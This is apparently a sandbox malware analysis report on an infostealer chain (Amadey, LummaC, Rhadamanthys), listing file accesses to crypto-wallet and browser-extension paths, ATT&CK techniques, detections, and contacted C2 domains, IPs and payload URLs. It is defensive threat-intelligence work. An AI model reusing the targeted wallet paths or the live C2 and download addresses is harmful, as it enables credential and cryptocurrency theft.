                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: Yara matchFile source: 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5639a58f3b.exe PID: 340, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 850609077b.exe PID: 4196, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 5639a58f3b.exe PID: 340, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 850609077b.exe PID: 4196, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected RHADAMANTHYS Stealer
                          Source: Yara matchFile source: 0000002A.00000003.3314605880.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.3336661213.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.3318038166.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.3318224508.0000000005930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0063EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_0063EC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0063DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_0063DF51

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts2
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		11
                          Deobfuscate/Decode Files or Information                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		412
                          Process Injection                          		41
                          Obfuscated Files or Information                          		21
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol3
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter                          		11
                          Scheduled Task/Job                          		11
                          Scheduled Task/Job                          		121
                          Software Packing                          		Security Account Manager3
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts11
                          Scheduled Task/Job                          		Login HookLogin Hook1
                          DLL Side-Loading                          		NTDS355
                          System Information Discovery                          		Distributed Component Object Model21
                          Input Capture                          		124
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          PowerShell                          		Network Logon ScriptNetwork Logon Script11
                          Masquerading                          		LSA Secrets1071
                          Security Software Discovery                          		SSH2
                          Clipboard Data                          		Fallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials2
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items412
                          Process Injection                          		DCSync261
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          Remote System Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                          System Network Configuration Discovery                          		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577291 Sample: file.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 108 grannyejh.lat 2->108 110 sweepyribs.lat 2->110 112 pancakedipyps.click 2->112 126 Suricata IDS alerts for network traffic 2->126 128 Found malware configuration 2->128 130 Malicious sample detected (through community Yara rule) 2->130 132 16 other signatures 2->132 11 skotes.exe 25 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 skotes.exe 2->20         started        signatures3 process4 dnsIp5 114 185.215.113.43, 49862, 49871, 49888 WHOLESALECONNECTIONSNL Portugal 11->114 116 31.41.244.11, 49877, 49894, 49912 AEROEXPRESS-ASRU Russian Federation 11->116 96 C:\Users\user\AppData\...\1459165c97.exe, PE32 11->96 dropped 98 C:\Users\user\AppData\...\7c1324dac5.exe, PE32 11->98 dropped 100 C:\Users\user\AppData\...\850609077b.exe, PE32 11->100 dropped 106 5 other malicious files 11->106 dropped 176 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->176 178 Hides threads from debuggers 11->178 180 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->180 22 1459165c97.exe 11->22         started        25 7c1324dac5.exe 8 11->25         started        28 5639a58f3b.exe 1 11->28         started        30 850609077b.exe 1 11->30         started        102 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->102 dropped 104 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->104 dropped 182 Detected unpacking (changes PE section rights) 16->182 184 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->184 186 Tries to evade debugger and weak emulator (self modifying code) 16->186 188 Tries to detect virtualization through RDTSC time measurements 16->188 32 skotes.exe 16->32         started        190 Antivirus detection for dropped file 18->190 192 Multi AV Scanner detection for dropped file 18->192 194 Suspicious powershell command line found 18->194 198 4 other signatures 18->198 34 powershell.exe 18->34         started        36 explorer.exe 18->36         started        196 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 20->196 file6 signatures7 process8 file9 136 Detected unpacking (changes PE section rights) 22->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 22->138 140 Machine Learning detection for dropped file 22->140 156 4 other signatures 22->156 38 svchost.exe 22->38         started        41 WerFault.exe 22->41         started        88 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 25->88 dropped 90 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 25->90 dropped 142 Multi AV Scanner detection for dropped file 25->142 43 cmd.exe 2 25->43         started        144 Contains functionality to inject code into remote processes 28->144 146 Injects a PE file into a foreign processes 28->146 148 LummaC encrypted strings found 28->148 45 5639a58f3b.exe 28->45         started        48 conhost.exe 28->48         started        50 850609077b.exe 30->50         started        52 conhost.exe 30->52         started        150 Antivirus detection for dropped file 32->150 152 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 32->152 154 Tries to evade debugger and weak emulator (self modifying code) 32->154 54 PING.EXE 34->54         started        56 conhost.exe 34->56         started        signatures10 process11 dnsIp12 158 Checks if the current machine is a virtual machine (disk enumeration) 38->158 160 Switches to a custom stack to bypass stack traces 38->160 162 Uses cmd line tools excessively to alter registry or file data 43->162 58 in.exe 43->58         started        62 7z.exe 43->62         started        64 conhost.exe 43->64         started        66 9 other processes 43->66 118 grannyejh.lat 172.67.179.109, 443, 49895, 49919 CLOUDFLARENETUS United States 45->118 164 Found many strings related to Crypto-Wallets (likely being stolen) 45->164 166 Tries to steal Crypto Currency Wallets 45->166 120 pancakedipyps.click 104.21.23.76, 443, 49913, 49929 CLOUDFLARENETUS United States 50->120 168 Tries to harvest and steal browser information (history, passwords, etc) 50->168 122 127.1.10.1 unknown unknown 54->122 signatures13 process14 file15 92 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 58->92 dropped 170 Suspicious powershell command line found 58->170 172 Uses cmd line tools excessively to alter registry or file data 58->172 174 Uses schtasks.exe or at.exe to add and modify task schedules 58->174 68 powershell.exe 58->68         started        71 attrib.exe 58->71         started        73 attrib.exe 58->73         started        75 schtasks.exe 58->75         started        94 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 62->94 dropped signatures16 process17 signatures18 134 Uses ping.exe to check the status of other devices and networks 68->134 77 PING.EXE 68->77         started        80 conhost.exe 68->80         started        82 conhost.exe 71->82         started        84 conhost.exe 73->84         started        86 conhost.exe 75->86         started        process19 dnsIp20 124 127.0.0.1 unknown unknown 77->124

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe53%ReversingLabsWin32.Infostealer.Tinba
                          file.exe57%VirustotalBrowse
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe88%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe75%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe75%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe88%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe67%ReversingLabsWin64.Trojan.Nekark
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe67%ReversingLabsWin64.Trojan.Nekark

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          pancakedipyps.click0%Avira URL Cloudsafe
                          http://31.41.244.11/files/fate/random.exeA0%Avira URL Cloudsafe
                          https://pancakedipyps.click//0%Avira URL Cloudsafe
                          http://31.41.244.11/files/unique3/random.exe00%Avira URL Cloudsafe
                          http://31.41.244.11/files/dodo/random.exeN0%Avira URL Cloudsafe
                          http://185.215.113.43/Zu7JuNko/index.php871001100%Avira URL Cloudmalware
                          https://grannyejh.lat/apiq0%Avira URL Cloudsafe
                          https://pancakedipyps.click/0%Avira URL Cloudsafe
                          https://grannyejh.lat:443/api0%Avira URL Cloudsafe
                          https://pancakedipyps.click:443/api0%Avira URL Cloudsafe
                          https://pancakedipyps.click/api0%Avira URL Cloudsafe
                          https://grannyejh.lat/90%Avira URL Cloudsafe
                          https://grannyejh.lat/0%Avira URL Cloudsafe
                          http://31.41.244.11/files/dodo/random.exe8476K30%Avira URL Cloudsafe
                          http://31.41.244.11/files/dodo/random.exe%30%Avira URL Cloudsafe
                          http://31.41.244.11/files/dodo/random.exe100%Avira URL Cloudphishing
                          https://grannyejh.lat/api0%Avira URL Cloudsafe
                          https://grannyejh.lat/apigsK20%Avira URL Cloudsafe
                          https://pancakedipyps.click/h0%Avira URL Cloudsafe
                          https://pancakedipyps.click/f0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          pancakedipyps.click
                          		104.21.23.76
                          		truefalse
                            		high
                            grannyejh.lat
                            		172.67.179.109
                            		truetrue
                              		unknown
                              sweepyribs.lat
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                pancakedipyps.clicktrue
                                • Avira URL Cloud: safe
                                		unknown
                                necklacebudi.latfalse
                                  		high
                                  aspecteirs.latfalse
                                    		high
                                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                                      		high
                                      sustainskelet.latfalse
                                        		high
                                        crosshuaht.latfalse
                                          		high
                                          rapeflowwj.latfalse
                                            		high
                                            https://pancakedipyps.click/apitrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            energyaffai.latfalse
                                              		high
                                              https://grannyejh.lat/apitrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              grannyejh.latfalse
                                                		high
                                                discokeyus.latfalse
                                                  		high
                                                  https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxefalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtab5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://185.215.113.43/Zu7JuNko/index.phpYskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://31.41.244.11/files/unique3/random.exe0skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ocsp.sectigo.com0skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://31.41.244.11/files/unique3/random.exeskotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://31.41.244.11/files/fate/random.exeskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://185.215.113.43/Zu7JuNko/index.phpHskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://185.215.113.43/Zu7JuNko/index.phpnuskotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://31.41.244.11/files/fate/random.exeAskotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://pancakedipyps.click/850609077b.exe, 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://pancakedipyps.click:443/api850609077b.exe, 0000000D.00000002.3381728843.000000000125A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://grannyejh.lat/apiq5639a58f3b.exe, 0000000A.00000002.3384196465.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://grannyejh.lat:443/api5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://185.215.113.43/Zu7JuNko/index.php871001skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search5639a58f3b.exe, 0000000A.00000003.3208648876.0000000003879000.00000004.00000800.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3208546066.000000000387B000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240472156.0000000003A98000.00000004.00000800.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000003.3240286170.0000000003A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://31.41.244.11/files/dodo/random.exeNskotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://pancakedipyps.click//850609077b.exe, 0000000D.00000002.3381728843.00000000012A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://185.215.113.43/Zu7JuNko/index.php1skotes.exe, 00000006.00000002.3384635500.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000006.00000002.3384635500.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.0000000001113000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
